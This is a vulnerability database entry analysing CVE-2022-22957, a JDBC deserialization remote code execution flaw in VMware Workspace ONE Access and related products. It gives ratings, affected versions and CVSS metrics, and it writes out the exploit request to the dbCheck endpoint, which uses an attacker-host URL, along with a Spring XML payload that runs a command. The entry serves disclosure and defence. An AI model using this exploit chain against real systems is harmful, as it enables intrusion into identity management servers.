Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Network
3

CVE-2022-22957

Disclosure Date: April 13, 2022
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two remote code execution vulnerabilities (CVE-2022-22957 & CVE-2022-22958). A malicious actor with administrative access can trigger deserialization of untrusted data through malicious JDBC URI which may result in remote code execution.

Add Assessment

3
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

This is an authenticated remote code execution vulnerability which gives access in the context of the horizon user however authentication can easily be by-passed with CVE-2022-22956. The list of affected products and corresponding versions are:

Vulnerable Application Vulnerable version
VMware Workspace ONE Access (Access) 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
VMware Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3
VMware vRealize Automation (vRA) 8.x, 7.6
VMware Cloud Foundation 4.x

Reason for Exploitability & Attacker Value rating.

As mentioned in my write up for CVE-2022-22956 this vulnerability was bundled up VMSA-2022-0011 along with 8 other CVEs. Out of all the CVEs in this advisory CVE-2022-22954 really stole the show as it was an unauth RCE. Not as many paid much mind to this CVE + CVE-2022-22956 (authentication by-pass) which when combined together with CVE-2022-22960 (LPE) gives attackers yet another exploitation path to unauthenticated RCE as root.

How it works

This vulnerability abuses the dbCheck method inside the com.vmware.horizon.rest.controller.system.DBConnectionCheckController class. The method accepts an attacker controlled parameter jdbcUrl which gets passed through a string of method calls until it eventually reaches  a DriverManager.getConnection sink which will lead to an arbitrary JDBC URI connection.

Remote code execution can be achieved through the socketFactory property of the PostgreSQL JDBC driver. An attacker can set the socketFactory and socketFactoryArg properties in order to trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Due to the fact VMware Workspace One uses Spring with a PostgreSQL database FileSystemXmlApplicationContext can be used.

The attacker sends a POST request to the following URI: /SAAS/API/1.0/REST/system/dbCheck with the following data:
jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{attacker-ip-address}:#{attacker-port-hosting-malicious-file}/#{filename}

While hosting the following file:

<beans xmlns="[http://www.springframework.org/schema/beans](http://www.springframework.org/schema/beans)" xmlns:xsi="[http://www.w3.org/2001/XMLSchema-instance](http://www.w3.org/2001/XMLSchema-instance)" xsi:schemaLocation="[http://www.springframework.org/schema/beans](http://www.springframework.org/schema/beans) [http://www.springframework.org/schema/beans/spring-beans.xsd](http://www.springframework.org/schema/beans/spring-beans.xsd)">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>touch</value>
        <value>/tmp/rce</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

The above file will be downloaded by the victim and the command in side the constructor-arg will be executed in the context of the horizon user.

References:

https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution

CVSS V3 Severity and Metrics
Base Score:
7.2 High
Impact Score:
5.9
Exploitability Score:
1.2
Vector:
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • vmware

Products

  • cloud foundation,
  • identity manager 3.3.3,
  • identity manager 3.3.4,
  • identity manager 3.3.5,
  • identity manager 3.3.6,
  • vrealize automation,
  • vrealize automation 7.6,
  • vrealize suite lifecycle manager,
  • workspace one access 20.10.0.0,
  • workspace one access 20.10.0.1,
  • workspace one access 21.08.0.0,
  • workspace one access 21.08.0.1

Additional Info

Technical Analysis